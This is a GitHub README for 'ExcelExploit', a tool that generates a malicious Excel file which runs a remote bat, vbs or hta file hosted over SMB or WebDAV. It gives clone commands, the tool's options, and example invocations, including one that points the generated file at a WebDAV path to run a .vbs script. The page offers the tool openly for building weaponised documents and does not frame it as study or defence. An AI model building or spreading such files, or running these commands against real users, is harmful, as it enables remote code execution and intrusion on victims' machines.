Skip to content

Latest commit

 

History

History
52 lines (33 loc) · 802 Bytes

File metadata and controls

52 lines (33 loc) · 802 Bytes

Excel Exploit



Create a malicious excel file that runs a remote file hosted via SMB or WebDAV

git clone https://github.com/TukoG/ExcelExploit
cd ExcelExploit

Usage

usage: main.py [-h] [--protocol exploit_file] [--output OUTPUT]

options:
  -h, --help            show this help message and exit

  --protocol exploit_file, -p exploit_file
                        file to execute (bat,vbs,hta) 

  --output OUTPUT, -o OUTPUT
                        output mal xlsx file (default: ./exloit.xlsx)
python3 main.py -h 
python main.py -p "file:///C:\test\test.vbs"
python main.py -p "file:///C:\test\test.vbs" -o mal.xlsx
python main.py -p "file:///\\127.0.0.1@8000/DavWWWRoot/test.vbs"